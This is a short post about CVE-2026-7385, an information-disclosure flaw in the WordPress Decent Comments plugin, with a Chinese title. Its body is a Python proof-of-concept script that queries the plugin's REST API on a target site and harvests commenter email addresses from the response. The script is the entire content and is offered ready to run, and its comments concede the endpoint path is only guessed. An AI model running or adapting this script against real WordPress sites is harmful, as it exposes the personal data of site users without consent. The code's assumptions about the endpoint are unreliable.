CVE-2026-7385 WordPress Decent Comments插件信息泄露漏洞

import requests import re def poc(target_url): """ Proof of Concept for CVE-2026-7385 This script attempts to enumerate user emails via the vulnerable REST API endpoint. """ # The specific endpoint might vary, commonly follows pattern: /wp-json/decent-comments/v1/comments # or similar structure based on plugin registration. api_endpoint = "/wp-json/decent-comments/v1/comments" full_url = f"{target_url.rstrip('/')}{api_endpoint}" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: response = requests.get(full_url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Request successful to {full_url}") data = response.json() emails = set() # Extract emails assuming the response is a list of comment objects if isinstance(data, list): for item in data: # Check common fields for email addresses for field in ['author_email', 'email', 'user_email']: if field in item and item[field]: emails.add(item[field]) if emails: print(f"[+] Found {len(emails)} unique email addresses:") for email in emails: print(f" - {email}") else: print("[-] No emails found in response. Structure might be different or endpoint patched.") print("Response snippet:", str(data)[:200]) else: print(f"[-] Failed to retrieve data. Status Code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://example-wordpress-site.com" # Replace with actual target poc(target)